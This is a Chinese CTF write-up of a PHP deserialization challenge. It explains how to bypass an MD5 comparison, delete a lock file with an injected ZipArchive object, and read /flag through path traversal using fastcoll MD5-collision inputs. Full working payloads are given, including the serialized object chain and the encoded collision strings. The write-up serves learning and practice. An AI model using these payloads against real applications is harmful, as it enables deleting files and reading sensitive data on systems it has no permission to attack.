题目链接:跳转提示
打开网址,可以直接看到网页链接:
<?php
error_reporting(0);
ini_set("display_errors","Off");
class Jesen {
public $filename;
public $content;
public $me;
function __wakeup(){
$this->me = new Ctf();
}
function __destruct() {
$this->me->open($this->filename,$this->content);
}
}
class Ctf {
function __toString() {
return "die";
}
function open($filename, $content){
if(!file_get_contents("./sandbox/lock.lock")){
echo file_get_contents(substr($_POST['b'],0,30));
die();
}else{
file_put_contents("./sandbox/".md5($filename.time()),$content);
die("or you can guess the final filename?");
}
}
}
if(!isset($_POST['a'])){
highlight_file(__FILE__);
die();
}else{
if(($_POST['b'] != $_POST['a']) && (md5($_POST['b']) === md5($_POST['a']))){
unserialize($_POST['c']);
}
}
代码分析,需要绕过两个判断条件,第一个需要a不等于b,但a与b的MD5一样,因为md5()函数无法处理数组,只要使a与b是两个不同的数组,md5(a)与md5(b)都返回0,则等号成立;
第二个判断条件,输入http://114.67.175.224:12378/sandbox/lock.lock,可以发现该文件存在,当./sandbox/lock.lock文件不存在时,就可以利用file_get_contents()输出/flag里的内容
要想办法删除文件,可以利用php内置类ZipArchive,这是一个专门用于文件压缩和解压缩的类,刚好他的open函数open(filename,8),会删除相应文件,其序列化内容:O:10:"ZipArchive":5:{s:6:"status";i:0;s:9:"statusSys";i:0;s:8:"numFiles";i:0;s:8:"filename";s:0:"";s:7:"comment";s:0:"";}
因此payload: a[]=[1]&b[]=[2]&c=O:5:"Jesen":4:{s:8:"filename";s:19:"./sandbox/lock.lock";s:7:"content";i:8;s:2:"me";O:10:"ZipArchive":5:{s:6:"status";i:0;s:9:"statusSys";i:0;s:8:"numFiles";i:0;s:8:"filename";s:0:"";s:7:"comment";s:0:"";}}(这里需要输入错误的Jesen属性数,以绕过wakeup函数)
输入网址查询http://114.67.175.224:12378/sandbox/lock.lock,发现文件不存在
利用fastcoll生成两个相同的MD5码的a和b,并保证b的前30字符是flag路径:
payload:
a=.%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fflag%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%FEv%CA%A8%12%C1W%8BA%26Y%81%98h%CF%09%BC%AF%C2%F7%F1%F8%D2%06%2Fvyv%2B%96.%B2%D8%EA%C6%EB%ECj%15%F9%0B%06OT%92%91T%FB%A4%C3V%29%E6%83%84%26J%D9O%81%D9%7F%06%EC%DB1%B7%84%E8%16%A5%09%90VC%F4W%98%D5%AD%88%F2.%A7%0D%C8%7C%EE%24e%21%27%CC%B7%DD%CDU%2F%7E%28%D3%95%A1%A5%CE%86%D9%29%8E%C0j%7F%F9%14%D8%9Fu%C9C%F3y%9BQ%F1%7C%1D%DD%AD&b=.%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fflag%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%FEv%CA%A8%12%C1W%8BA%26Y%81%98h%CF%09%BC%AF%C2w%F1%F8%D2%06%2Fvyv%2B%96.%B2%D8%EA%C6%EB%ECj%15%F9%0B%06OT%92%11U%FB%A4%C3V%29%E6%83%84%26J%D9O%01%D9%7F%06%EC%DB1%B7%84%E8%16%A5%09%90VC%F4W%98%D5%AD%88%F2.%27%0D%C8%7C%EE%24e%21%27%CC%B7%DD%CDU%2F%7E%28%D3%95%A1%A5%CE%86%D9%29%8E%40j%7F%F9%14%D8%9Fu%C9C%F3y%9BQq%7C%1D%DD%AD&c=O:5:"Jesen":3:{s:8:"filename";N;s:7:"content";N;s:2:"me";N;}
得到结果
(不能直接复制生成的文章内容进行加密,因为编码不一样)